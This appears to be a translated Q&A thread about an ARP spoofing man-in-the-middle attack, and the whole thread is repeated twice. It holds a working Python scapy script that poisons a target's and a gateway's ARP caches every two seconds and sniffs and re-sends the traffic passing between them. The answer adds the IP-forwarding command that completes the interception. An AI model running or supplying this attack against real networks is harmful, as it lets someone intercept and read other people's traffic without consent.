使用 python scapy 的 ARP 欺骗不起作用
ARP Spoofing using python scapy not working
我使用 scapy python 代码成功完成了 ARP 欺骗。目标电脑中用于网关的 MAC 地址已更改为我电脑的 MAC 地址,路由器缓存中目标电脑的 MAC 地址也已更改为我的 MAC 地址。现在我想通过我的电脑将这些数据包转发到相应的目的地,这样我就可以看到目标电脑和网关之间的流量。但转发不起作用。
import os
import sys
import threading
import signal
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
# MAC address of the machine running this script; it is used further down
# in the BPF capture filters ("... and ether dst <our_mac>").
our_mac='d8:5d:e2:0c:58:87'
# Both addresses are read interactively and are used unvalidated in the ARP
# queries and in the BPF filter strings built later in the script.
print 'Enter Target IP:'
target_ip = raw_input()
print 'Enter Gateway IP'
gateway_ip = raw_input()
# Only interpolated into the "Starting sniffer" messages; no sniff() call in
# this script receives it as a limit.
packet_count = 50
# turn off output
conf.verb = 0
def get_mac(ip_address):
    """Resolve ip_address to a MAC address with a broadcast ARP request.

    Returns the Ethernet source address of the first answer received, or
    None when nothing answers within the timeout and retries.
    """
    arp_query = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address)
    answered, _unanswered = srp(arp_query, timeout=2, retry=10)
    # Each entry is a (sent, received) pair; only the first reply is used,
    # and the address it claims is taken at face value.
    for _sent, reply in answered:
        return reply[Ether].src
    return None
# Resolve both peers up front; the script stops if either lookup fails.
# NOTE: the failure paths exit with status 0, so a caller cannot tell them
# apart from a normal exit.
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
    print("[!!!] Failed to get gateway MAC. Exiting.")
    sys.exit(0)
print("[*] Gateway %s is at %s" % (gateway_ip, gateway_mac))

target_mac = get_mac(target_ip)
if target_mac is None:
    print("[!!!] Failed to get target MAC. Exiting.")
    sys.exit(0)
print("[*] Target %s is at %s" % (target_ip, target_mac))
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
    """Re-announce the genuine IP-to-MAC bindings of the gateway and target.

    Sends 100 ARP replies per direction, addressed to the broadcast hardware
    address and carrying the real MAC in hwsrc, then calls sys.exit(0).
    """
    print("[*] Restoring target...")
    broadcast = "ff:ff:ff:ff:ff:ff"
    # (announced IP, its real MAC, recipient IP), gateway binding first.
    corrections = (
        (gateway_ip, gateway_mac, target_ip),
        (target_ip, target_mac, gateway_ip),
    )
    for announced_ip, real_mac, recipient_ip in corrections:
        send(
            ARP(op=2, psrc=announced_ip, pdst=recipient_ip,
                hwdst=broadcast, hwsrc=real_mac),
            count=100,
        )
    print("[*] Target Restored...")
    # NOTE: sys.exit() raises SystemExit, so the os.kill() line after it is
    # never reached. In a worker thread SystemExit ends only that thread,
    # and the only caller in this file (poison_target) runs in one.
    sys.exit(0)
    os.kill(os.getpid(), signal.SIGINT)
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
    """Send a forged ARP reply to the target and to the gateway every 2 s.

    Each reply (op=2) claims the other peer's IP address and leaves hwsrc
    unset. Unsolicited replies repeated at a fixed interval are the pattern
    that ARP monitoring (e.g. arpwatch) and switch-side Dynamic ARP
    Inspection are meant to flag.

    The page lost its indentation; this layout assumes the first
    sys.exit(0) belongs to the except branch -- TODO confirm.
    """
    to_target = ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=target_mac)
    to_gateway = ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=gateway_mac)
    print("[*] Beginning the ARP poison. [CTRL-C to stop]")
    while True:
        try:
            send(to_target)
            send(to_gateway)
            # `time` is not imported by name in this file; presumably it
            # arrives through `from scapy.all import *` -- verify.
            time.sleep(2)
        except KeyboardInterrupt:
            # NOTE: Python raises KeyboardInterrupt in the main thread only,
            # and this function is started in a worker thread, so this
            # cleanup path is not triggered by CTRL-C.
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
            sys.exit(0)
    # Not reached: the loop above has no break.
    print("[*] ARP poison attack finished.")
    sys.exit(0)
    return
def send_packet_to_gateway(pkt):
    """sniff() callback: readdress a captured frame to the gateway and re-send it.

    Reads the module-level gateway_mac. Only the Ethernet destination is
    rewritten; every other field of the frame is sent as captured.
    """
    try:
        # An IP layer is not required: any Ethernet frame without an ARP
        # layer is re-sent.
        if pkt.haslayer(Ether) and not pkt.haslayer(ARP):
            pkt[Ether].dst = gateway_mac
            sendp(pkt)
    except:
        # NOTE: the bare except also catches SystemExit and
        # KeyboardInterrupt, and every failure prints the same message.
        print("It's interrupt")
        sys.exit(0)
def send_packet_to_target(pkt):
    """sniff() callback: readdress a captured frame to the target and re-send it.

    Reads the module-level target_mac. Only the Ethernet destination is
    rewritten; every other field of the frame is sent as captured.
    """
    try:
        # An IP layer is not required: any Ethernet frame without an ARP
        # layer is re-sent.
        if pkt.haslayer(Ether) and not pkt.haslayer(ARP):
            pkt[Ether].dst = target_mac
            sendp(pkt)
    except:
        # NOTE: the bare except also catches SystemExit and
        # KeyboardInterrupt, and every failure prints the same message.
        print("It's interrupt")
        sys.exit(0)
def capture_packets():
    """Sniff frames for the target's IP that arrive at this host's MAC.

    Every matching frame is handed to send_packet_to_target. packet_count
    only appears in the log line; sniff() is called without a count.
    """
    try:
        print("[*] Starting sniffer for %d packets" % packet_count)
        to_target_filter = "dst host %s and ether dst %s" % (target_ip, our_mac)
        sniff(filter=to_target_filter, prn=send_packet_to_target)
    except KeyboardInterrupt:
        # The restore_target() call for this path is disabled in the file,
        # so no ARP cleanup happens here.
        print("It's interrupt")
        sys.exit(0)
    return
# start poison thread
poison_thread = threading.Thread(
    target=poison_target,
    args=(gateway_ip, gateway_mac, target_ip, target_mac),
)
poison_thread.start()
try:
    print("[*] Starting sniffer for %d packets" % packet_count)
    # Second sniffer (traffic addressed to the target) runs in its own thread.
    capture_thread = threading.Thread(target=capture_packets)
    capture_thread.start()
    # This thread handles frames sent by the target that arrive at our MAC.
    bpf_filter = "src host %s and ether dst %s" % (target_ip, our_mac)
    sniff(filter=bpf_filter, prn=send_packet_to_gateway)
except KeyboardInterrupt:
    # NOTE: the restore_target() call for this path is disabled in the file,
    # so CTRL-C leaves the ARP entries as they are. Both worker threads are
    # non-daemon, so the interpreter keeps running after this sys.exit()
    # until they return.
    sys.exit(0)
你不需要用 Scapy 转发数据包。你可以启用 IP 转发,系统会自动转发数据包。在 Linux 中,可以运行以下命令:
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
启用该设置后,你只需要用 Scapy 运行 ARP 投毒部分,不需要自己重定向数据包。注意上面的重定向是由当前 shell 而不是 `sudo` 执行的,因此该命令需要在 root shell 中运行;这是系统级设置,测试结束后应写回 0。
我使用 scapy python 代码成功完成了 ARP 欺骗。目标电脑中用于网关的 MAC 地址已更改为我电脑的 MAC 地址,路由器缓存中目标电脑的 MAC 地址也已更改为我的 MAC 地址。现在我想通过我的电脑将这些数据包转发到相应的目的地,这样我就可以看到目标电脑和网关之间的流量。但转发不起作用。
import os
import sys
import threading
import signal
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
# MAC address of the machine running this script; it is used further down
# in the BPF capture filters ("... and ether dst <our_mac>").
our_mac='d8:5d:e2:0c:58:87'
# Both addresses are read interactively and are used unvalidated in the ARP
# queries and in the BPF filter strings built later in the script.
print 'Enter Target IP:'
target_ip = raw_input()
print 'Enter Gateway IP'
gateway_ip = raw_input()
# Only interpolated into the "Starting sniffer" messages; no sniff() call in
# this script receives it as a limit.
packet_count = 50
# turn off output
conf.verb = 0
def get_mac(ip_address):
    """Resolve ip_address to a MAC address with a broadcast ARP request.

    Returns the Ethernet source address of the first answer received, or
    None when nothing answers within the timeout and retries.
    """
    arp_query = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address)
    answered, _unanswered = srp(arp_query, timeout=2, retry=10)
    # Each entry is a (sent, received) pair; only the first reply is used,
    # and the address it claims is taken at face value.
    for _sent, reply in answered:
        return reply[Ether].src
    return None
# Resolve both peers up front; the script stops if either lookup fails.
# NOTE: the failure paths exit with status 0, so a caller cannot tell them
# apart from a normal exit.
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
    print("[!!!] Failed to get gateway MAC. Exiting.")
    sys.exit(0)
print("[*] Gateway %s is at %s" % (gateway_ip, gateway_mac))

target_mac = get_mac(target_ip)
if target_mac is None:
    print("[!!!] Failed to get target MAC. Exiting.")
    sys.exit(0)
print("[*] Target %s is at %s" % (target_ip, target_mac))
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
    """Re-announce the genuine IP-to-MAC bindings of the gateway and target.

    Sends 100 ARP replies per direction, addressed to the broadcast hardware
    address and carrying the real MAC in hwsrc, then calls sys.exit(0).
    """
    print("[*] Restoring target...")
    broadcast = "ff:ff:ff:ff:ff:ff"
    # (announced IP, its real MAC, recipient IP), gateway binding first.
    corrections = (
        (gateway_ip, gateway_mac, target_ip),
        (target_ip, target_mac, gateway_ip),
    )
    for announced_ip, real_mac, recipient_ip in corrections:
        send(
            ARP(op=2, psrc=announced_ip, pdst=recipient_ip,
                hwdst=broadcast, hwsrc=real_mac),
            count=100,
        )
    print("[*] Target Restored...")
    # NOTE: sys.exit() raises SystemExit, so the os.kill() line after it is
    # never reached. In a worker thread SystemExit ends only that thread,
    # and the only caller in this file (poison_target) runs in one.
    sys.exit(0)
    os.kill(os.getpid(), signal.SIGINT)
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
    """Send a forged ARP reply to the target and to the gateway every 2 s.

    Each reply (op=2) claims the other peer's IP address and leaves hwsrc
    unset. Unsolicited replies repeated at a fixed interval are the pattern
    that ARP monitoring (e.g. arpwatch) and switch-side Dynamic ARP
    Inspection are meant to flag.

    The page lost its indentation; this layout assumes the first
    sys.exit(0) belongs to the except branch -- TODO confirm.
    """
    to_target = ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=target_mac)
    to_gateway = ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=gateway_mac)
    print("[*] Beginning the ARP poison. [CTRL-C to stop]")
    while True:
        try:
            send(to_target)
            send(to_gateway)
            # `time` is not imported by name in this file; presumably it
            # arrives through `from scapy.all import *` -- verify.
            time.sleep(2)
        except KeyboardInterrupt:
            # NOTE: Python raises KeyboardInterrupt in the main thread only,
            # and this function is started in a worker thread, so this
            # cleanup path is not triggered by CTRL-C.
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
            sys.exit(0)
    # Not reached: the loop above has no break.
    print("[*] ARP poison attack finished.")
    sys.exit(0)
    return
def send_packet_to_gateway(pkt):
    """sniff() callback: readdress a captured frame to the gateway and re-send it.

    Reads the module-level gateway_mac. Only the Ethernet destination is
    rewritten; every other field of the frame is sent as captured.
    """
    try:
        # An IP layer is not required: any Ethernet frame without an ARP
        # layer is re-sent.
        if pkt.haslayer(Ether) and not pkt.haslayer(ARP):
            pkt[Ether].dst = gateway_mac
            sendp(pkt)
    except:
        # NOTE: the bare except also catches SystemExit and
        # KeyboardInterrupt, and every failure prints the same message.
        print("It's interrupt")
        sys.exit(0)
def send_packet_to_target(pkt):
    """sniff() callback: readdress a captured frame to the target and re-send it.

    Reads the module-level target_mac. Only the Ethernet destination is
    rewritten; every other field of the frame is sent as captured.
    """
    try:
        # An IP layer is not required: any Ethernet frame without an ARP
        # layer is re-sent.
        if pkt.haslayer(Ether) and not pkt.haslayer(ARP):
            pkt[Ether].dst = target_mac
            sendp(pkt)
    except:
        # NOTE: the bare except also catches SystemExit and
        # KeyboardInterrupt, and every failure prints the same message.
        print("It's interrupt")
        sys.exit(0)
def capture_packets():
    """Sniff frames for the target's IP that arrive at this host's MAC.

    Every matching frame is handed to send_packet_to_target. packet_count
    only appears in the log line; sniff() is called without a count.
    """
    try:
        print("[*] Starting sniffer for %d packets" % packet_count)
        to_target_filter = "dst host %s and ether dst %s" % (target_ip, our_mac)
        sniff(filter=to_target_filter, prn=send_packet_to_target)
    except KeyboardInterrupt:
        # The restore_target() call for this path is disabled in the file,
        # so no ARP cleanup happens here.
        print("It's interrupt")
        sys.exit(0)
    return
# start poison thread
poison_thread = threading.Thread(
    target=poison_target,
    args=(gateway_ip, gateway_mac, target_ip, target_mac),
)
poison_thread.start()
try:
    print("[*] Starting sniffer for %d packets" % packet_count)
    # Second sniffer (traffic addressed to the target) runs in its own thread.
    capture_thread = threading.Thread(target=capture_packets)
    capture_thread.start()
    # This thread handles frames sent by the target that arrive at our MAC.
    bpf_filter = "src host %s and ether dst %s" % (target_ip, our_mac)
    sniff(filter=bpf_filter, prn=send_packet_to_gateway)
except KeyboardInterrupt:
    # NOTE: the restore_target() call for this path is disabled in the file,
    # so CTRL-C leaves the ARP entries as they are. Both worker threads are
    # non-daemon, so the interpreter keeps running after this sys.exit()
    # until they return.
    sys.exit(0)
你不需要用 Scapy 转发数据包。你可以启用 IP 转发,系统会自动转发数据包。在 Linux 中,可以运行以下命令:
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
启用该设置后,你只需要用 Scapy 运行 ARP 投毒部分,不需要自己重定向数据包。注意上面的重定向是由当前 shell 而不是 `sudo` 执行的,因此该命令需要在 root shell 中运行;这是系统级设置,测试结束后应写回 0。